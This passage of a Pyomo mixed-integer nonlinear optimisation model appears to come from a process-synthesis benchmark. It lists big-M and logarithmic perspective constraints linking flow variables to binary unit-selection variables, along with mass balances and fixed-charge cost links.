m.c271 = Constraint(expr= m.x359 - 1.83548069293539*m.b507 <= 0)
m.c272 = Constraint(expr= m.x360 - 1.83548069293539*m.b508 <= 0)
m.c273 = Constraint(expr= m.x361 - 1.83548069293539*m.b509 <= 0)
m.c274 = Constraint(expr= m.x366 + 1.83548069293539*m.b506 <= 1.83548069293539)
m.c275 = Constraint(expr= m.x367 + 1.83548069293539*m.b507 <= 1.83548069293539)
m.c276 = Constraint(expr= m.x368 + 1.83548069293539*m.b508 <= 1.83548069293539)
m.c277 = Constraint(expr= m.x369 + 1.83548069293539*m.b509 <= 1.83548069293539)
m.c278 = Constraint(expr=(m.x374/(0.001 + 0.999*m.b510) - 0.9*log(1 + m.x326/(0.001 + 0.999*m.b510)))*(0.001 + 0.999*
m.b510) <= 0)
m.c279 = Constraint(expr=(m.x375/(0.001 + 0.999*m.b511) - 0.9*log(1 + m.x327/(0.001 + 0.999*m.b511)))*(0.001 + 0.999*
m.b511) <= 0)
m.c280 = Constraint(expr=(m.x376/(0.001 + 0.999*m.b512) - 0.9*log(1 + m.x328/(0.001 + 0.999*m.b512)))*(0.001 + 0.999*
m.b512) <= 0)
m.c281 = Constraint(expr=(m.x377/(0.001 + 0.999*m.b513) - 0.9*log(1 + m.x329/(0.001 + 0.999*m.b513)))*(0.001 + 0.999*
m.b513) <= 0)
m.c282 = Constraint(expr= m.x330 == 0)
m.c283 = Constraint(expr= m.x331 == 0)
m.c284 = Constraint(expr= m.x332 == 0)
m.c285 = Constraint(expr= m.x333 == 0)
m.c286 = Constraint(expr= m.x382 == 0)
m.c287 = Constraint(expr= m.x383 == 0)
m.c288 = Constraint(expr= m.x384 == 0)
m.c289 = Constraint(expr= m.x385 == 0)
m.c290 = Constraint(expr= m.x126 - m.x326 - m.x330 == 0)
m.c291 = Constraint(expr= m.x127 - m.x327 - m.x331 == 0)
m.c292 = Constraint(expr= m.x128 - m.x328 - m.x332 == 0)
m.c293 = Constraint(expr= m.x129 - m.x329 - m.x333 == 0)
m.c294 = Constraint(expr= m.x146 - m.x374 - m.x382 == 0)
m.c295 = Constraint(expr= m.x147 - m.x375 - m.x383 == 0)
m.c296 = Constraint(expr= m.x148 - m.x376 - m.x384 == 0)
m.c297 = Constraint(expr= m.x149 - m.x377 - m.x385 == 0)
m.c298 = Constraint(expr= m.x326 - 3.34221486003388*m.b510 <= 0)
m.c299 = Constraint(expr= m.x327 - 3.34221486003388*m.b511 <= 0)
m.c300 = Constraint(expr= m.x328 - 3.34221486003388*m.b512 <= 0)
m.c301 = Constraint(expr= m.x329 - 3.34221486003388*m.b513 <= 0)
m.c302 = Constraint(expr= m.x330 + 3.34221486003388*m.b510 <= 3.34221486003388)
m.c303 = Constraint(expr= m.x331 + 3.34221486003388*m.b511 <= 3.34221486003388)
m.c304 = Constraint(expr= m.x332 + 3.34221486003388*m.b512 <= 3.34221486003388)
m.c305 = Constraint(expr= m.x333 + 3.34221486003388*m.b513 <= 3.34221486003388)
m.c306 = Constraint(expr= m.x374 - 1.32154609891348*m.b510 <= 0)
m.c307 = Constraint(expr= m.x375 - 1.32154609891348*m.b511 <= 0)
m.c308 = Constraint(expr= m.x376 - 1.32154609891348*m.b512 <= 0)
m.c309 = Constraint(expr= m.x377 - 1.32154609891348*m.b513 <= 0)
m.c310 = Constraint(expr= m.x382 + 1.32154609891348*m.b510 <= 1.32154609891348)
m.c311 = Constraint(expr= m.x383 + 1.32154609891348*m.b511 <= 1.32154609891348)
m.c312 = Constraint(expr= m.x384 + 1.32154609891348*m.b512 <= 1.32154609891348)
m.c313 = Constraint(expr= m.x385 + 1.32154609891348*m.b513 <= 1.32154609891348)
m.c314 = Constraint(expr=(m.x390/(0.001 + 0.999*m.b514) - log(1 + m.x298/(0.001 + 0.999*m.b514)))*(0.001 + 0.999*m.b514)
<= 0)
m.c315 = Constraint(expr=(m.x391/(0.001 + 0.999*m.b515) - log(1 + m.x299/(0.001 + 0.999*m.b515)))*(0.001 + 0.999*m.b515)
<= 0)
m.c316 = Constraint(expr=(m.x392/(0.001 + 0.999*m.b516) - log(1 + m.x300/(0.001 + 0.999*m.b516)))*(0.001 + 0.999*m.b516)
<= 0)
m.c317 = Constraint(expr=(m.x393/(0.001 + 0.999*m.b517) - log(1 + m.x301/(0.001 + 0.999*m.b517)))*(0.001 + 0.999*m.b517)
<= 0)
m.c318 = Constraint(expr= m.x306 == 0)
m.c319 = Constraint(expr= m.x307 == 0)
m.c320 = Constraint(expr= m.x308 == 0)
m.c321 = Constraint(expr= m.x309 == 0)
m.c322 = Constraint(expr= m.x394 == 0)
m.c323 = Constraint(expr= m.x395 == 0)
m.c324 = Constraint(expr= m.x396 == 0)
m.c325 = Constraint(expr= m.x397 == 0)
m.c326 = Constraint(expr= m.x114 - m.x298 - m.x306 == 0)
m.c327 = Constraint(expr= m.x115 - m.x299 - m.x307 == 0)
m.c328 = Constraint(expr= m.x116 - m.x300 - m.x308 == 0)
m.c329 = Constraint(expr= m.x117 - m.x301 - m.x309 == 0)
m.c330 = Constraint(expr= m.x150 - m.x390 - m.x394 == 0)
m.c331 = Constraint(expr= m.x151 - m.x391 - m.x395 == 0)
m.c332 = Constraint(expr= m.x152 - m.x392 - m.x396 == 0)
m.c333 = Constraint(expr= m.x153 - m.x393 - m.x397 == 0)
m.c334 = Constraint(expr= m.x298 - 2.54515263975353*m.b514 <= 0)
m.c335 = Constraint(expr= m.x299 - 2.54515263975353*m.b515 <= 0)
m.c336 = Constraint(expr= m.x300 - 2.54515263975353*m.b516 <= 0)
m.c337 = Constraint(expr= m.x301 - 2.54515263975353*m.b517 <= 0)
m.c338 = Constraint(expr= m.x306 + 2.54515263975353*m.b514 <= 2.54515263975353)
m.c339 = Constraint(expr= m.x307 + 2.54515263975353*m.b515 <= 2.54515263975353)
m.c340 = Constraint(expr= m.x308 + 2.54515263975353*m.b516 <= 2.54515263975353)
m.c341 = Constraint(expr= m.x309 + 2.54515263975353*m.b517 <= 2.54515263975353)
m.c342 = Constraint(expr= m.x390 - 1.26558121681553*m.b514 <= 0)
m.c343 = Constraint(expr= m.x391 - 1.26558121681553*m.b515 <= 0)
m.c344 = Constraint(expr= m.x392 - 1.26558121681553*m.b516 <= 0)
m.c345 = Constraint(expr= m.x393 - 1.26558121681553*m.b517 <= 0)
m.c346 = Constraint(expr= m.x394 + 1.26558121681553*m.b514 <= 1.26558121681553)
m.c347 = Constraint(expr= m.x395 + 1.26558121681553*m.b515 <= 1.26558121681553)
m.c348 = Constraint(expr= m.x396 + 1.26558121681553*m.b516 <= 1.26558121681553)
m.c349 = Constraint(expr= m.x397 + 1.26558121681553*m.b517 <= 1.26558121681553)
m.c350 = Constraint(expr= - 0.9*m.x334 + m.x398 == 0)
m.c351 = Constraint(expr= - 0.9*m.x335 + m.x399 == 0)
m.c352 = Constraint(expr= - 0.9*m.x336 + m.x400 == 0)
m.c353 = Constraint(expr= - 0.9*m.x337 + m.x401 == 0)
m.c354 = Constraint(expr= m.x338 == 0)
m.c355 = Constraint(expr= m.x339 == 0)
m.c356 = Constraint(expr= m.x340 == 0)
m.c357 = Constraint(expr= m.x341 == 0)
m.c358 = Constraint(expr= m.x402 == 0)
m.c359 = Constraint(expr= m.x403 == 0)
m.c360 = Constraint(expr= m.x404 == 0)
m.c361 = Constraint(expr= m.x405 == 0)
m.c362 = Constraint(expr= m.x130 - m.x334 - m.x338 == 0)
m.c363 = Constraint(expr= m.x131 - m.x335 - m.x339 == 0)
m.c364 = Constraint(expr= m.x132 - m.x336 - m.x340 == 0)
m.c365 = Constraint(expr= m.x133 - m.x337 - m.x341 == 0)
m.c366 = Constraint(expr= m.x154 - m.x398 - m.x402 == 0)
m.c367 = Constraint(expr= m.x155 - m.x399 - m.x403 == 0)
m.c368 = Constraint(expr= m.x156 - m.x400 - m.x404 == 0)
m.c369 = Constraint(expr= m.x157 - m.x401 - m.x405 == 0)
m.c370 = Constraint(expr= m.x334 - 15*m.b518 <= 0)
m.c371 = Constraint(expr= m.x335 - 15*m.b519 <= 0)
m.c372 = Constraint(expr= m.x336 - 15*m.b520 <= 0)
m.c373 = Constraint(expr= m.x337 - 15*m.b521 <= 0)
m.c374 = Constraint(expr= m.x338 + 15*m.b518 <= 15)
m.c375 = Constraint(expr= m.x339 + 15*m.b519 <= 15)
m.c376 = Constraint(expr= m.x340 + 15*m.b520 <= 15)
m.c377 = Constraint(expr= m.x341 + 15*m.b521 <= 15)
m.c378 = Constraint(expr= m.x398 - 13.5*m.b518 <= 0)
m.c379 = Constraint(expr= m.x399 - 13.5*m.b519 <= 0)
m.c380 = Constraint(expr= m.x400 - 13.5*m.b520 <= 0)
m.c381 = Constraint(expr= m.x401 - 13.5*m.b521 <= 0)
m.c382 = Constraint(expr= m.x402 + 13.5*m.b518 <= 13.5)
m.c383 = Constraint(expr= m.x403 + 13.5*m.b519 <= 13.5)
m.c384 = Constraint(expr= m.x404 + 13.5*m.b520 <= 13.5)
m.c385 = Constraint(expr= m.x405 + 13.5*m.b521 <= 13.5)
m.c386 = Constraint(expr= - 0.6*m.x342 + m.x406 == 0)
m.c387 = Constraint(expr= - 0.6*m.x343 + m.x407 == 0)
m.c388 = Constraint(expr= - 0.6*m.x344 + m.x408 == 0)
m.c389 = Constraint(expr= - 0.6*m.x345 + m.x409 == 0)
m.c390 = Constraint(expr= m.x346 == 0)
m.c391 = Constraint(expr= m.x347 == 0)
m.c392 = Constraint(expr= m.x348 == 0)
m.c393 = Constraint(expr= m.x349 == 0)
m.c394 = Constraint(expr= m.x410 == 0)
m.c395 = Constraint(expr= m.x411 == 0)
m.c396 = Constraint(expr= m.x412 == 0)
m.c397 = Constraint(expr= m.x413 == 0)
m.c398 = Constraint(expr= m.x134 - m.x342 - m.x346 == 0)
m.c399 = Constraint(expr= m.x135 - m.x343 - m.x347 == 0)
m.c400 = Constraint(expr= m.x136 - m.x344 - m.x348 == 0)
m.c401 = Constraint(expr= m.x137 - m.x345 - m.x349 == 0)
m.c402 = Constraint(expr= m.x158 - m.x406 - m.x410 == 0)
m.c403 = Constraint(expr= m.x159 - m.x407 - m.x411 == 0)
m.c404 = Constraint(expr= m.x160 - m.x408 - m.x412 == 0)
m.c405 = Constraint(expr= m.x161 - m.x409 - m.x413 == 0)
m.c406 = Constraint(expr= m.x342 - 15*m.b522 <= 0)
m.c407 = Constraint(expr= m.x343 - 15*m.b523 <= 0)
m.c408 = Constraint(expr= m.x344 - 15*m.b524 <= 0)
m.c409 = Constraint(expr= m.x345 - 15*m.b525 <= 0)
m.c410 = Constraint(expr= m.x346 + 15*m.b522 <= 15)
m.c411 = Constraint(expr= m.x347 + 15*m.b523 <= 15)
m.c412 = Constraint(expr= m.x348 + 15*m.b524 <= 15)
m.c413 = Constraint(expr= m.x349 + 15*m.b525 <= 15)
m.c414 = Constraint(expr= m.x406 - 9*m.b522 <= 0)
m.c415 = Constraint(expr= m.x407 - 9*m.b523 <= 0)
m.c416 = Constraint(expr= m.x408 - 9*m.b524 <= 0)
m.c417 = Constraint(expr= m.x409 - 9*m.b525 <= 0)
m.c418 = Constraint(expr= m.x410 + 9*m.b522 <= 9)
m.c419 = Constraint(expr= m.x411 + 9*m.b523 <= 9)
m.c420 = Constraint(expr= m.x412 + 9*m.b524 <= 9)
m.c421 = Constraint(expr= m.x413 + 9*m.b525 <= 9)
m.c422 = Constraint(expr=(m.x414/(0.001 + 0.999*m.b526) - 1.1*log(1 + m.x350/(0.001 + 0.999*m.b526)))*(0.001 + 0.999*
m.b526) <= 0)
m.c423 = Constraint(expr=(m.x415/(0.001 + 0.999*m.b527) - 1.1*log(1 + m.x351/(0.001 + 0.999*m.b527)))*(0.001 + 0.999*
m.b527) <= 0)
m.c424 = Constraint(expr=(m.x416/(0.001 + 0.999*m.b528) - 1.1*log(1 + m.x352/(0.001 + 0.999*m.b528)))*(0.001 + 0.999*
m.b528) <= 0)
m.c425 = Constraint(expr=(m.x417/(0.001 + 0.999*m.b529) - 1.1*log(1 + m.x353/(0.001 + 0.999*m.b529)))*(0.001 + 0.999*
m.b529) <= 0)
m.c426 = Constraint(expr= m.x354 == 0)
m.c427 = Constraint(expr= m.x355 == 0)
m.c428 = Constraint(expr= m.x356 == 0)
m.c429 = Constraint(expr= m.x357 == 0)
m.c430 = Constraint(expr= m.x418 == 0)
m.c431 = Constraint(expr= m.x419 == 0)
m.c432 = Constraint(expr= m.x420 == 0)
m.c433 = Constraint(expr= m.x421 == 0)
m.c434 = Constraint(expr= m.x138 - m.x350 - m.x354 == 0)
m.c435 = Constraint(expr= m.x139 - m.x351 - m.x355 == 0)
m.c436 = Constraint(expr= m.x140 - m.x352 - m.x356 == 0)
m.c437 = Constraint(expr= m.x141 - m.x353 - m.x357 == 0)
m.c438 = Constraint(expr= m.x162 - m.x414 - m.x418 == 0)
m.c439 = Constraint(expr= m.x163 - m.x415 - m.x419 == 0)
m.c440 = Constraint(expr= m.x164 - m.x416 - m.x420 == 0)
m.c441 = Constraint(expr= m.x165 - m.x417 - m.x421 == 0)
m.c442 = Constraint(expr= m.x350 - 15*m.b526 <= 0)
m.c443 = Constraint(expr= m.x351 - 15*m.b527 <= 0)
m.c444 = Constraint(expr= m.x352 - 15*m.b528 <= 0)
m.c445 = Constraint(expr= m.x353 - 15*m.b529 <= 0)
m.c446 = Constraint(expr= m.x354 + 15*m.b526 <= 15)
m.c447 = Constraint(expr= m.x355 + 15*m.b527 <= 15)
m.c448 = Constraint(expr= m.x356 + 15*m.b528 <= 15)
m.c449 = Constraint(expr= m.x357 + 15*m.b529 <= 15)
m.c450 = Constraint(expr= m.x414 - 3.04984759446376*m.b526 <= 0)
m.c451 = Constraint(expr= m.x415 - 3.04984759446376*m.b527 <= 0)
m.c452 = Constraint(expr= m.x416 - 3.04984759446376*m.b528 <= 0)
m.c453 = Constraint(expr= m.x417 - 3.04984759446376*m.b529 <= 0)
m.c454 = Constraint(expr= m.x418 + 3.04984759446376*m.b526 <= 3.04984759446376)
m.c455 = Constraint(expr= m.x419 + 3.04984759446376*m.b527 <= 3.04984759446376)
m.c456 = Constraint(expr= m.x420 + 3.04984759446376*m.b528 <= 3.04984759446376)
m.c457 = Constraint(expr= m.x421 + 3.04984759446376*m.b529 <= 3.04984759446376)
m.c458 = Constraint(expr= - 0.9*m.x362 + m.x454 == 0)
m.c459 = Constraint(expr= - 0.9*m.x363 + m.x455 == 0)
m.c460 = Constraint(expr= - 0.9*m.x364 + m.x456 == 0)
m.c461 = Constraint(expr= - 0.9*m.x365 + m.x457 == 0)
m.c462 = Constraint(expr= - m.x438 + m.x454 == 0)
m.c463 = Constraint(expr= - m.x439 + m.x455 == 0)
m.c464 = Constraint(expr= - m.x440 + m.x456 == 0)
m.c465 = Constraint(expr= - m.x441 + m.x457 == 0)
m.c466 = Constraint(expr= m.x370 == 0)
m.c467 = Constraint(expr= m.x371 == 0)
m.c468 = Constraint(expr= m.x372 == 0)
m.c469 = Constraint(expr= m.x373 == 0)
m.c470 = Constraint(expr= m.x442 == 0)
m.c471 = Constraint(expr= m.x443 == 0)
m.c472 = Constraint(expr= m.x444 == 0)
m.c473 = Constraint(expr= m.x445 == 0)
m.c474 = Constraint(expr= m.x458 == 0)
m.c475 = Constraint(expr= m.x459 == 0)
m.c476 = Constraint(expr= m.x460 == 0)
m.c477 = Constraint(expr= m.x461 == 0)
m.c478 = Constraint(expr= m.x142 - m.x362 - m.x370 == 0)
m.c479 = Constraint(expr= m.x143 - m.x363 - m.x371 == 0)
m.c480 = Constraint(expr= m.x144 - m.x364 - m.x372 == 0)
m.c481 = Constraint(expr= m.x145 - m.x365 - m.x373 == 0)
m.c482 = Constraint(expr= m.x174 - m.x438 - m.x442 == 0)
m.c483 = Constraint(expr= m.x175 - m.x439 - m.x443 == 0)
m.c484 = Constraint(expr= m.x176 - m.x440 - m.x444 == 0)
m.c485 = Constraint(expr= m.x177 - m.x441 - m.x445 == 0)
m.c486 = Constraint(expr= m.x206 - m.x454 - m.x458 == 0)
m.c487 = Constraint(expr= m.x207 - m.x455 - m.x459 == 0)
m.c488 = Constraint(expr= m.x208 - m.x456 - m.x460 == 0)
m.c489 = Constraint(expr= m.x209 - m.x457 - m.x461 == 0)
m.c490 = Constraint(expr= m.x362 - 1.83548069293539*m.b530 <= 0)
m.c491 = Constraint(expr= m.x363 - 1.83548069293539*m.b531 <= 0)
m.c492 = Constraint(expr= m.x364 - 1.83548069293539*m.b532 <= 0)
m.c493 = Constraint(expr= m.x365 - 1.83548069293539*m.b533 <= 0)
m.c494 = Constraint(expr= m.x370 + 1.83548069293539*m.b530 <= 1.83548069293539)
m.c495 = Constraint(expr= m.x371 + 1.83548069293539*m.b531 <= 1.83548069293539)
m.c496 = Constraint(expr= m.x372 + 1.83548069293539*m.b532 <= 1.83548069293539)
m.c497 = Constraint(expr= m.x373 + 1.83548069293539*m.b533 <= 1.83548069293539)
m.c498 = Constraint(expr= m.x438 - 20*m.b530 <= 0)
m.c499 = Constraint(expr= m.x439 - 20*m.b531 <= 0)
m.c500 = Constraint(expr= m.x440 - 20*m.b532 <= 0)
m.c501 = Constraint(expr= m.x441 - 20*m.b533 <= 0)
m.c502 = Constraint(expr= m.x442 + 20*m.b530 <= 20)
m.c503 = Constraint(expr= m.x443 + 20*m.b531 <= 20)
m.c504 = Constraint(expr= m.x444 + 20*m.b532 <= 20)
m.c505 = Constraint(expr= m.x445 + 20*m.b533 <= 20)
m.c506 = Constraint(expr= m.x454 - 20*m.b530 <= 0)
m.c507 = Constraint(expr= m.x455 - 20*m.b531 <= 0)
m.c508 = Constraint(expr= m.x456 - 20*m.b532 <= 0)
m.c509 = Constraint(expr= m.x457 - 20*m.b533 <= 0)
m.c510 = Constraint(expr= m.x458 + 20*m.b530 <= 20)
m.c511 = Constraint(expr= m.x459 + 20*m.b531 <= 20)
m.c512 = Constraint(expr= m.x460 + 20*m.b532 <= 20)
m.c513 = Constraint(expr= m.x461 + 20*m.b533 <= 20)
m.c514 = Constraint(expr=(m.x462/(0.001 + 0.999*m.b534) - log(1 + m.x378/(0.001 + 0.999*m.b534)))*(0.001 + 0.999*m.b534)
<= 0)
m.c515 = Constraint(expr=(m.x463/(0.001 + 0.999*m.b535) - log(1 + m.x379/(0.001 + 0.999*m.b535)))*(0.001 + 0.999*m.b535)
<= 0)
m.c516 = Constraint(expr=(m.x464/(0.001 + 0.999*m.b536) - log(1 + m.x380/(0.001 + 0.999*m.b536)))*(0.001 + 0.999*m.b536)
<= 0)
m.c517 = Constraint(expr=(m.x465/(0.001 + 0.999*m.b537) - log(1 + m.x381/(0.001 + 0.999*m.b537)))*(0.001 + 0.999*m.b537)
<= 0)
m.c518 = Constraint(expr= m.x386 == 0)
m.c519 = Constraint(expr= m.x387 == 0)
m.c520 = Constraint(expr= m.x388 == 0)
m.c521 = Constraint(expr= m.x389 == 0)
m.c522 = Constraint(expr= m.x466 == 0)
m.c523 = Constraint(expr= m.x467 == 0)
m.c524 = Constraint(expr= m.x468 == 0)
m.c525 = Constraint(expr= m.x469 == 0)
m.c526 = Constraint(expr= m.x146 - m.x378 - m.x386 == 0)
m.c527 = Constraint(expr= m.x147 - m.x379 - m.x387 == 0)
m.c528 = Constraint(expr= m.x148 - m.x380 - m.x388 == 0)
m.c529 = Constraint(expr= m.x149 - m.x381 - m.x389 == 0)
m.c530 = Constraint(expr= m.x210 - m.x462 - m.x466 == 0)
m.c531 = Constraint(expr= m.x211 - m.x463 - m.x467 == 0)
m.c532 = Constraint(expr= m.x212 - m.x464 - m.x468 == 0)
m.c533 = Constraint(expr= m.x213 - m.x465 - m.x469 == 0)
m.c534 = Constraint(expr= m.x378 - 1.32154609891348*m.b534 <= 0)
m.c535 = Constraint(expr= m.x379 - 1.32154609891348*m.b535 <= 0)
m.c536 = Constraint(expr= m.x380 - 1.32154609891348*m.b536 <= 0)
m.c537 = Constraint(expr= m.x381 - 1.32154609891348*m.b537 <= 0)
m.c538 = Constraint(expr= m.x386 + 1.32154609891348*m.b534 <= 1.32154609891348)
m.c539 = Constraint(expr= m.x387 + 1.32154609891348*m.b535 <= 1.32154609891348)
m.c540 = Constraint(expr= m.x388 + 1.32154609891348*m.b536 <= 1.32154609891348)
m.c541 = Constraint(expr= m.x389 + 1.32154609891348*m.b537 <= 1.32154609891348)
m.c542 = Constraint(expr= m.x462 - 0.842233385663186*m.b534 <= 0)
m.c543 = Constraint(expr= m.x463 - 0.842233385663186*m.b535 <= 0)
m.c544 = Constraint(expr= m.x464 - 0.842233385663186*m.b536 <= 0)
m.c545 = Constraint(expr= m.x465 - 0.842233385663186*m.b537 <= 0)
m.c546 = Constraint(expr= m.x466 + 0.842233385663186*m.b534 <= 0.842233385663186)
m.c547 = Constraint(expr= m.x467 + 0.842233385663186*m.b535 <= 0.842233385663186)
m.c548 = Constraint(expr= m.x468 + 0.842233385663186*m.b536 <= 0.842233385663186)
m.c549 = Constraint(expr= m.x469 + 0.842233385663186*m.b537 <= 0.842233385663186)
m.c550 = Constraint(expr=(m.x470/(0.001 + 0.999*m.b538) - 0.7*log(1 + m.x422/(0.001 + 0.999*m.b538)))*(0.001 + 0.999*
m.b538) <= 0)
m.c551 = Constraint(expr=(m.x471/(0.001 + 0.999*m.b539) - 0.7*log(1 + m.x423/(0.001 + 0.999*m.b539)))*(0.001 + 0.999*
m.b539) <= 0)
m.c552 = Constraint(expr=(m.x472/(0.001 + 0.999*m.b540) - 0.7*log(1 + m.x424/(0.001 + 0.999*m.b540)))*(0.001 + 0.999*
m.b540) <= 0)
m.c553 = Constraint(expr=(m.x473/(0.001 + 0.999*m.b541) - 0.7*log(1 + m.x425/(0.001 + 0.999*m.b541)))*(0.001 + 0.999*
m.b541) <= 0)
m.c554 = Constraint(expr= m.x426 == 0)
m.c555 = Constraint(expr= m.x427 == 0)
m.c556 = Constraint(expr= m.x428 == 0)
m.c557 = Constraint(expr= m.x429 == 0)
m.c558 = Constraint(expr= m.x474 == 0)
m.c559 = Constraint(expr= m.x475 == 0)
m.c560 = Constraint(expr= m.x476 == 0)
m.c561 = Constraint(expr= m.x477 == 0)
m.c562 = Constraint(expr= m.x166 - m.x422 - m.x426 == 0)
m.c563 = Constraint(expr= m.x167 - m.x423 - m.x427 == 0)
m.c564 = Constraint(expr= m.x168 - m.x424 - m.x428 == 0)
m.c565 = Constraint(expr= m.x169 - m.x425 - m.x429 == 0)
m.c566 = Constraint(expr= m.x214 - m.x470 - m.x474 == 0)
m.c567 = Constraint(expr= m.x215 - m.x471 - m.x475 == 0)
m.c568 = Constraint(expr= m.x216 - m.x472 - m.x476 == 0)
m.c569 = Constraint(expr= m.x217 - m.x473 - m.x477 == 0)
m.c570 = Constraint(expr= m.x422 - 1.26558121681553*m.b538 <= 0)
m.c571 = Constraint(expr= m.x423 - 1.26558121681553*m.b539 <= 0)
m.c572 = Constraint(expr= m.x424 - 1.26558121681553*m.b540 <= 0)
m.c573 = Constraint(expr= m.x425 - 1.26558121681553*m.b541 <= 0)
m.c574 = Constraint(expr= m.x426 + 1.26558121681553*m.b538 <= 1.26558121681553)
m.c575 = Constraint(expr= m.x427 + 1.26558121681553*m.b539 <= 1.26558121681553)
m.c576 = Constraint(expr= m.x428 + 1.26558121681553*m.b540 <= 1.26558121681553)
m.c577 = Constraint(expr= m.x429 + 1.26558121681553*m.b541 <= 1.26558121681553)
m.c578 = Constraint(expr= m.x470 - 0.572481933717686*m.b538 <= 0)
m.c579 = Constraint(expr= m.x471 - 0.572481933717686*m.b539 <= 0)
m.c580 = Constraint(expr= m.x472 - 0.572481933717686*m.b540 <= 0)
m.c581 = Constraint(expr= m.x473 - 0.572481933717686*m.b541 <= 0)
m.c582 = Constraint(expr= m.x474 + 0.572481933717686*m.b538 <= 0.572481933717686)
m.c583 = Constraint(expr= m.x475 + 0.572481933717686*m.b539 <= 0.572481933717686)
m.c584 = Constraint(expr= m.x476 + 0.572481933717686*m.b540 <= 0.572481933717686)
m.c585 = Constraint(expr= m.x477 + 0.572481933717686*m.b541 <= 0.572481933717686)
m.c586 = Constraint(expr=(m.x478/(0.001 + 0.999*m.b542) - 0.65*log(1 + m.x430/(0.001 + 0.999*m.b542)))*(0.001 + 0.999*
m.b542) <= 0)
m.c587 = Constraint(expr=(m.x479/(0.001 + 0.999*m.b543) - 0.65*log(1 + m.x431/(0.001 + 0.999*m.b543)))*(0.001 + 0.999*
m.b543) <= 0)
m.c588 = Constraint(expr=(m.x480/(0.001 + 0.999*m.b544) - 0.65*log(1 + m.x432/(0.001 + 0.999*m.b544)))*(0.001 + 0.999*
m.b544) <= 0)
m.c589 = Constraint(expr=(m.x481/(0.001 + 0.999*m.b545) - 0.65*log(1 + m.x433/(0.001 + 0.999*m.b545)))*(0.001 + 0.999*
m.b545) <= 0)
m.c590 = Constraint(expr=(m.x478/(0.001 + 0.999*m.b542) - 0.65*log(1 + m.x446/(0.001 + 0.999*m.b542)))*(0.001 + 0.999*
m.b542) <= 0)
m.c591 = Constraint(expr=(m.x479/(0.001 + 0.999*m.b543) - 0.65*log(1 + m.x447/(0.001 + 0.999*m.b543)))*(0.001 + 0.999*
m.b543) <= 0)
m.c592 = Constraint(expr=(m.x480/(0.001 + 0.999*m.b544) - 0.65*log(1 + m.x448/(0.001 + 0.999*m.b544)))*(0.001 + 0.999*
m.b544) <= 0)
m.c593 = Constraint(expr=(m.x481/(0.001 + 0.999*m.b545) - 0.65*log(1 + m.x449/(0.001 + 0.999*m.b545)))*(0.001 + 0.999*
m.b545) <= 0)
m.c594 = Constraint(expr= m.x434 == 0)
m.c595 = Constraint(expr= m.x435 == 0)
m.c596 = Constraint(expr= m.x436 == 0)
m.c597 = Constraint(expr= m.x437 == 0)
m.c598 = Constraint(expr= m.x450 == 0)
m.c599 = Constraint(expr= m.x451 == 0)
m.c600 = Constraint(expr= m.x452 == 0)
m.c601 = Constraint(expr= m.x453 == 0)
m.c602 = Constraint(expr= m.x482 == 0)
m.c603 = Constraint(expr= m.x483 == 0)
m.c604 = Constraint(expr= m.x484 == 0)
m.c605 = Constraint(expr= m.x485 == 0)
m.c606 = Constraint(expr= m.x170 - m.x430 - m.x434 == 0)
m.c607 = Constraint(expr= m.x171 - m.x431 - m.x435 == 0)
m.c608 = Constraint(expr= m.x172 - m.x432 - m.x436 == 0)
m.c609 = Constraint(expr= m.x173 - m.x433 - m.x437 == 0)
m.c610 = Constraint(expr= m.x182 - m.x446 - m.x450 == 0)
m.c611 = Constraint(expr= m.x183 - m.x447 - m.x451 == 0)
m.c612 = Constraint(expr= m.x184 - m.x448 - m.x452 == 0)
m.c613 = Constraint(expr= m.x185 - m.x449 - m.x453 == 0)
m.c614 = Constraint(expr= m.x218 - m.x478 - m.x482 == 0)
m.c615 = Constraint(expr= m.x219 - m.x479 - m.x483 == 0)
m.c616 = Constraint(expr= m.x220 - m.x480 - m.x484 == 0)
m.c617 = Constraint(expr= m.x221 - m.x481 - m.x485 == 0)
m.c618 = Constraint(expr= m.x430 - 1.26558121681553*m.b542 <= 0)
m.c619 = Constraint(expr= m.x431 - 1.26558121681553*m.b543 <= 0)
m.c620 = Constraint(expr= m.x432 - 1.26558121681553*m.b544 <= 0)
m.c621 = Constraint(expr= m.x433 - 1.26558121681553*m.b545 <= 0)
m.c622 = Constraint(expr= m.x434 + 1.26558121681553*m.b542 <= 1.26558121681553)
m.c623 = Constraint(expr= m.x435 + 1.26558121681553*m.b543 <= 1.26558121681553)
m.c624 = Constraint(expr= m.x436 + 1.26558121681553*m.b544 <= 1.26558121681553)
m.c625 = Constraint(expr= m.x437 + 1.26558121681553*m.b545 <= 1.26558121681553)
m.c626 = Constraint(expr= m.x446 - 33.5*m.b542 <= 0)
m.c627 = Constraint(expr= m.x447 - 33.5*m.b543 <= 0)
m.c628 = Constraint(expr= m.x448 - 33.5*m.b544 <= 0)
m.c629 = Constraint(expr= m.x449 - 33.5*m.b545 <= 0)
m.c630 = Constraint(expr= m.x450 + 33.5*m.b542 <= 33.5)
m.c631 = Constraint(expr= m.x451 + 33.5*m.b543 <= 33.5)
m.c632 = Constraint(expr= m.x452 + 33.5*m.b544 <= 33.5)
m.c633 = Constraint(expr= m.x453 + 33.5*m.b545 <= 33.5)
m.c634 = Constraint(expr= m.x478 - 2.30162356062425*m.b542 <= 0)
m.c635 = Constraint(expr= m.x479 - 2.30162356062425*m.b543 <= 0)
m.c636 = Constraint(expr= m.x480 - 2.30162356062425*m.b544 <= 0)
m.c637 = Constraint(expr= m.x481 - 2.30162356062425*m.b545 <= 0)
m.c638 = Constraint(expr= m.x482 + 2.30162356062425*m.b542 <= 2.30162356062425)
m.c639 = Constraint(expr= m.x483 + 2.30162356062425*m.b543 <= 2.30162356062425)
m.c640 = Constraint(expr= m.x484 + 2.30162356062425*m.b544 <= 2.30162356062425)
m.c641 = Constraint(expr= m.x485 + 2.30162356062425*m.b545 <= 2.30162356062425)
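# c642-c701 appear to tie the cost variables x2-x61 to the selection binaries,
# e.g. c642 gives x2 = -5*b546; the coefficients mirror the fixed-charge terms
# that enter the objective directly.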
m.c642 = Constraint(expr= m.x2 + 5*m.b546 == 0)
m.c643 = Constraint(expr= m.x3 + 4*m.b547 == 0)
m.c644 = Constraint(expr= m.x4 + 6*m.b548 == 0)
m.c645 = Constraint(expr= m.x5 + 3*m.b549 == 0)
m.c646 = Constraint(expr= m.x6 + 8*m.b550 == 0)
m.c647 = Constraint(expr= m.x7 + 7*m.b551 == 0)
m.c648 = Constraint(expr= m.x8 + 6*m.b552 == 0)
m.c649 = Constraint(expr= m.x9 + 5*m.b553 == 0)
m.c650 = Constraint(expr= m.x10 + 6*m.b554 == 0)
m.c651 = Constraint(expr= m.x11 + 9*m.b555 == 0)
